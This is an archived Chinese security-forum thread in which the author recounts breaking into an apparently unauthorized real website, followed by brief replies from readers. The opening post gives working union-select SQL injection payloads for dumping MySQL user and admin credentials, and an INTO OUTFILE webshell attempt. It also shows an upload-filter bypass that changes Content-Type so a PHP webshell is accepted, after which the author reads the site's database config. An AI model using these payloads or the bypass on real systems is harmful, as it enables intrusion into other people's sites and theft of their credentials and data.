Select Browser Mobile | Continue

Silic Group Froum Archive - Silic Security

 Forgot Password?
 Join Us
Search
Show: 6277|Reply: 93

[原创] 纠结的注入,上传绕过

  [Copy URL]
kevinsss The user has been deleted
Posted 2016-6-1 16:24:06 | Show all replies |Read Mode
本帖最后由 kevinsss 于 2016-6-17 16:16 编辑

直接入主题,发现一网站,接口URL是RESTFUL方式的,随手加了个',报错,发现注入点:
000.png
好家伙,连完整语句都报出来了,既然知道了就构造注入把。
看到原始用的order by语句,那就不用union猜字段了,直接order by xx,一一尝试,
最后发现order by 19的时候报错,说明该表有18个字段:
11111.png 2222.png
接着,看哪个字段能显示:
  1. +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
Copy
悲剧好像只有2可以显示,不过也够了
看看系统用户信息,由于是MySQL就不用猜了,直接:
  1. +union+select+1,concat(user,0x5f,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+mysql.user--
Copy
3333.png
结果确实缺省信息,还有部分没有显示出来,又试了其它页面,貌似没有发现注入点,继续攻克该注入点
既然只显示一部分,那就用个取巧的方法,一次显示不出来,用substring()分几次显示好了,然后再拼接
  1. substring(concat(admin_user,0x5f,admin_pass),10,30)
Copy
最后组合了root的密码,破解看看,果然破解失败!
只好另找出路了,既然root用户,看看能不能用load_file()加载'/etc/passwd'文件,好像不行,用hex,unhex等方法都不行,
读出来空白,应该是系统权限不够。
再试试:
  1. select '一句话' into outfile '/var/www/html'
Copy
也不行,貌似是应该php的引号过滤,而'/var/www/html'这个又不能用hex编码,放弃,继续找出路。
接下来,爆表名:
  1. 查看当前数据库
  2. union+select+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
  3. 下属所有表
  4. union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables+t+where+t.table_schema=0x6f786d736264626568325f6d65646961--#
Copy
4444.png
发现了cms_admin表,应该是系统后台账户表,列出该表列名:
  1. union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.columns+t+where+t.table_name=0x636d735f61646d696e--#
Copy
5555.png
最后查看系统后台用户和密码:
  1. union+select+1,concat(admin_user,0x5f,admin_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+cms_admin--
Copy
6666.png
又是显示不全,再用substring截取,拼接构造完整的
最后得出admin的密码,居然是SHA1加密,说好的md5呢,一样加入破解,还好破解成功!
扫面后台,很简单,加个/admin就出来了,用刚才的账户密码登录,发现用的KindEditor编辑器,尝试了上传,
test.php.jpg,test.php;.jpg,test.php".jpg改名,截包等等方法,上传的文件格式做了限制,而且还用时间戳重名了,无语,继续寻找!
又找到一个上传图片的点,尝试上传,格式做了限制,一样也也用时间戳重命名了,Burp拦截绕过,还是提示不符合格式,符合格式的又
被重命名了201623423423.jpg这样的文件,最后发现客户端没有做格式的判断,那说明是服务端做的格式判断,蛋疼,还挺严谨!
最后还是百密一疏,被我找到了漏洞。
上传test.php,开启Burp拦截,把Content-Type:改成image/jpeg,居然过了,看来服务端只是验证了content-type,没有过滤扩展名
9999.png
最后上菜刀:

进入项目目录,拿到数据库配置信息,连接数据库:
1111111.png
好了,就到这里了,看了一下,是内网,懒得弄了,不想搞破坏提权了


Posted 2016-6-1 16:49:40 | Show all replies
得来全不费工夫
KeyMyran The user has been deleted
Posted 2016-6-1 17:13:36 | Show all replies
只为了看那个百密一疏
KeyMyran The user has been deleted
Posted 2016-6-1 17:16:17 | Show all replies
这百密一疏、、、、、一般我遇到的都是限定好content-type
治愈~~ The user has been deleted
Posted 2016-6-1 17:31:50 | Show all replies
学习学习....
莫须有 The user has been deleted
Posted 2016-6-1 18:39:23 | Show all replies
回帖是一种美德
Ro535 The user has been deleted
Posted 2016-6-1 18:48:00 | Show all replies
学习学习!
pkko881 The user has been deleted
Posted 2016-6-1 18:56:01 | Show all replies
一般我遇到的都是限定好content-type
纯洁小白 The user has been deleted
Posted 2016-6-1 19:34:12 | Show all replies
碰到个很难搞的站 也是注入...
流弊的小牛 The user has been deleted
Posted 2016-6-1 19:35:25 | Show all replies
学习各位大牛的花式
南宫剑影 The user has been deleted
Posted 2016-6-1 21:08:49 | Show all replies
我就是来学习的啊啊
W2015 The user has been deleted
Posted 2016-6-1 21:23:01 | Show all replies
66666学习了。
harkie The user has been deleted
Posted 2016-6-1 21:42:22 | Show all replies
只看绕过               
a997825438 The user has been deleted
Posted 2016-6-2 00:30:28 | Show all replies
学习上传姿势的!
nolove The user has been deleted
Posted 2016-6-2 08:55:09 from mobile phone | Show all replies
看看什么方法
nolove The user has been deleted
Posted 2016-6-2 08:55:26 from mobile phone | Show all replies
看看什么方法
ztaosony The user has been deleted
Posted 2016-6-2 09:05:57 | Show all replies
说好的百密一疏呢
cwxfd The user has been deleted
Posted 2016-6-2 09:33:42 | Show all replies
看一看,学习学习。。
sleepcat The user has been deleted
Posted 2016-6-2 09:59:40 | Show all replies
回帖是一种美德
月下之晨 The user has been deleted
Posted 2016-6-2 10:20:05 | Show all replies
学习大牛注入学习大牛注入学习大牛注入
You need to login before reply! Login | Join Us

Credit Rules of This Forum

Close

公告Privious /1 Next

小黑屋|手机版|Archiver|Silic Security

GMT+8, 2017-8-23 21:34

© 2001-2014 Silic Corp.

Quick Reply Top Return List